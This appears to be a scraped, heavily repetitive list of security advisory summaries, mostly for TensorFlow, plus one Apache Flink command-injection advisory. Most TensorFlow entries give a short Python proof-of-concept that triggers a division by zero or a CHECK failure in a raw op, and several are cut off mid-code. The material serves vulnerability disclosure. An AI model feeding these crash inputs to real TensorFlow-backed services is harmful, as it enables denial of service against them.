A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

Division by zero in `Conv3D`

A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )

Division by 0 in `SparseMatMul`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.

Division by 0 in `SparseMatMul`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.

Division by 0 in `Reverse`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)

Division by 0 in `Reverse`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)

Division by 0 in `Reverse`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Division by 0 in `FusedBatchNorm`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)

Division by 0 in `FusedBatchNorm`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)

Division by 0 in `FusedBatchNorm`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

Division by 0 in `FractionalAvgPool`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool: import tensorflow as tf value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] pseudo_random = False overlapping = False deterministic = False seed = 0 seed2 = 0 tf.raw_ops.FractionalAvgPool( value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)

Division by 0 in `DenseCountSparseOutput`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.DenseCountSparseOutput: import tensorflow as tf values = tf.constant([], shape=[0, 0], dtype=tf.int64) weights = tf.constant([]) tf.raw_ops.DenseCountSparseOutput( values=values, weights=weights, minlength=-1, maxlength=58, binary_output=True)

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …

Division by 0 in `Conv3DBackprop*`

The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0: import tensorflow as tf input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) import …

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropInput`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropInput: import tensorflow as tf input_tensor = tf.constant([52, 1, 1, 5], shape=[4], dtype=tf.int32) filter_tensor = tf.constant([], shape=[0, 1, 5, 0], dtype=tf.float32) out_backprop = tf.constant([], shape=[52, 1, 1, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropInput(input_sizes=input_tensor, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2DBackpropFilter`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 18, 1], use_cudnn_on_gpu=True, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1])

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

Division by 0 in `Conv2D`

An attacker can trigger a division by 0 in tf.raw_ops.Conv2D: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding)

Divide By Zero

TensorFlow is an end-to-end open source platform for machine learning. The TFLite implementation of hashtable lookup is vulnerable to a division by zero error An attacker can craft a model such that values's first dimension would be 0. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in …

Divide By Zero

TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul. The division by 0 occurs deep in Eigen code because the b tensor is empty. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and …

Command injection in Apache Flink

A vulnerability in Apache Flink (1.1.0 to 1.1.5, 1.2.0 to 1.2.1, 1.3.0 to 1.3.3, 1.4.0 to 1.4.2, 1.5.0 to 1.5.6, 1.6.0 to 1.6.4, 1.7.0 to 1.7.2, 1.8.0 to 1.8.3, 1.9.0 to 1.9.2, 1.10.0) where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to …

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)

CHECK-failure in `UnsortedSegmentJoin`

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin: import tensorflow as tf inputs = tf.constant([], dtype=tf.string) segment_ids = tf.constant([], dtype=tf.int32) num_segments = tf.constant([], dtype=tf.int32) separator = '' tf.raw_ops.UnsortedSegmentJoin( inputs=inputs, segment_ids=segment_ids, num_segments=num_segments, separator=separator)

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)

CHECK-fail in tf.raw_ops.EncodePng

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data: import tensorflow as tf image = tf.zeros([0, 0, 3]) image = tf.cast(image, dtype=tf.uint8) tf.raw_ops.EncodePng(image=image)

CHECK-fail in SparseCross due to type confusion

The API of tf.raw_ops.SparseCross allows combinations which would result in a CHECK-failure and denial of service: import tensorflow as tf hashed_output = False num_buckets = 1949315406 hash_key = 1869835877 out_type = tf.string internal_type = tf.string indices_1 = tf.constant([0, 6], shape=[1, 2], dtype=tf.int64) indices_2 = tf.constant([0, 0], shape=[1, 2], dtype=tf.int64) indices = [indices_1, indices_2] values_1 = tf.constant([0], dtype=tf.int64) values_2 = tf.constant([72], dtype=tf.int64) values = [values_1, values_2] batch_size = 4 shape_1 = …

CHECK-fail in SparseCross due to type confusion

